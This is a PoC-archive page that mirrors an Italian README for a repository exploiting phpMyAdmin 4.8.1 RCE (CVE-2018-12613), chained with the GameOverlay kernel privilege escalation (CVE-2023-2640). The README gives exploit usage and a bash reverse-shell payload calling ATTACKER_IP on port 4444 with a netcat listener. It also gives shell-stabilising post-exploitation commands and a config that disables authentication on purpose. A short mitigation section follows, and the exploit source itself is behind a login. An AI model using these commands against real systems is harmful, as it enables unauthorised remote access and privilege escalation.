Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1359 CNY

100%

CVE-2023-2640 PoC — Canonical Ubuntu Linux 安全漏洞

Source
Associated Vulnerability
Title: Canonical Ubuntu Linux 安全漏洞 (CVE-2023-2640)
Description:On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs", an unprivileged user may set privileged extended attributes on the mounted files, leading them to be set on the upper files without the appropriate security checks.
Description
Dimostrazione di una vulnerabilità RCE (Remote Code Execution) in phpMyAdmin 4.8.1, con exploit per reverse shell e analisi di privilege escalation tramite la vulnerabilità CVE-2023-2640/CVE-2023-32629 (GameOverlay) su kernel Linux.
Readme
# phpMyAdmin 4.8.1 - Remote Code Execution (RCE) Exploit

[![License: GPL-3.0](https://img.shields.io/badge/License-GPLv3-blue.svg)](https://www.gnu.org/licenses/gpl-3.0)
[![Open Source](https://img.shields.io/badge/Open%20Source-Yes-brightgreen)](https://opensource.org)
![Ethical Hacking](https://img.shields.io/badge/Ethical_Hacking-Responsible-red)


> **Filosofia Open Source**: Questo progetto è rilasciato sotto **GNU GPLv3** per garantire che tutte le modifiche e derivati rimangano liberi e open source.  
> **Avviso Legale**: Utilizzare solo su sistemi autorizzati. La violazione non autorizzata è illegale.

## Panoramica
Exploit per la vulnerabilità **CVE-2018-12613** in phpMyAdmin 4.8.1 che consente:
- Esecuzione di codice remoto (RCE) tramite injection PHP
- Reverse shell interattiva
- Privilege escalation (se combinato con CVE-2023-2640)

## Prerequisiti
- **Target**: 
  - phpMyAdmin 4.8.0/4.8.1
  - PHP < 7.3 (senza `disable_functions` restrittive)
- **Attaccante**:
  - Python 3.x
  - `netcat` per la reverse shell

## Esecuzione

### 1. Exploit Base (RCE)
	python3 exploit.py <TARGET_IP> <PORT> <PHPMA_PATH> <USER> <PASSWORD> "<COMMAND>"

### 2. Reverse Shell
#### 1. Sulla Macchina dell'attaccante
    nc -lnvp 4444
#### 2. Eseguire l'exploit con payload bash
    python3 exploit.py 192.168.1.100 80 /phpmyadmin admin pass123 \
    "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"
#### 3. Post-Exploitation
##### Per ottenere una shell stabile:
    python3 -c 'import pty; pty.spawn("/bin/bash")'
    # Oppure
    script /dev/null -c bash
## Configurazione Vulnearbile
### Per testing locale, modificare config.inc.php:
	$cfg['Servers'][1]['auth_type'] = 'config'; // Disabilita autenticazione
	$cfg['Servers'][1]['user'] = 'root';
	$cfg['Servers'][1]['password'] = '';
	$cfg['Servers'][1]['AllowNoPassword'] = true;

## Mitigazioni
### 1. Aggiornamento:
	sudo apt upgrade phpmyadmin
### 2. Hardering PHP:
	; php.ini
    allow_url_include = Off
    disable_functions = exec,passthru,shell_exec,system
### 3. Regole IPtables:
    iptables -A OUTPUT -p tcp --dport 4444 -j DROP

Risorse

    CVE-2018-12613

    GameOverlay Advisory

    MITRE ATT&CK T1190

## Autori

    Filippo Zullo

    Domenico Palmisano

    Alessandro Musto

    Elia Sakellarides
    

## Struttura del Repository

```plaintext
.
├── 📁 exploits/                  # Script di exploit
│   ├── 📁 phpmyadmin_rce/        # RCE in phpMyAdmin
│   │   ├── 📄 exploit.py         # Script principale (CVE-2018-12613)
│   │   ├── 📄 reverse_shell.sh   # Generator per reverse shell
│   │   └── 📄 auth_bypass.md     # Tecniche di bypass autenticazione
│   │
│   └── 📁 gameoverlay/           # Privilege escalation
│       ├── 📄 exploit.sh         # Exploit CVE-2023-2640 
│       └── 📄 kernel_patches.md  # Kernel vulnerabili
│
├── 📁 mitigations/               # Contromisure
│   ├── 📁 php_hardening/         # Hardening PHP
│   │   ├── 📄 php.ini.patch      # Configurazioni sicure
│   │   └── 📄 apache_config.md   # Setup Apache
│   │
│   ├── 📁 iptables_rules/        # Firewall
│   │   ├── 📄 iptables_rules.txt # Regole di blocco
│   │   └── 📄 setup_guide.md     # Guida implementazione
│   │
│   └── 📁 kernel_protections/    # Mitigazioni kernel
│       ├── 📄 disable_userns.sh  # Disabilita user namespace
│       └── 📄 sysctl_config.md   # Configurazione permanente
│
├── 📁 docs/                      # Documentazione
│   ├── 📄 project_report.pdf     # Report completo (PDF)
│   ├── 📄 setup_guide.md         # Istruzioni dettagliate
│   └── 📁 screenshots/           # Prove visive
│       ├── 📄 rce_poc.png        # Screenshot RCE
│       └── 📄 iptables_block.png # Traffico bloccato
│
├── 📁 scripts/                   # Utility
│   ├── 📄 install_dependencies.sh # Setup automatico
│   └── 📄 cleanup.sh             # Pulizia ambiente
│
├── 📄 README.md                  # Documentazione principale
└── 📄 LICENSE                    # Licenza GNU GPL-3.0
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →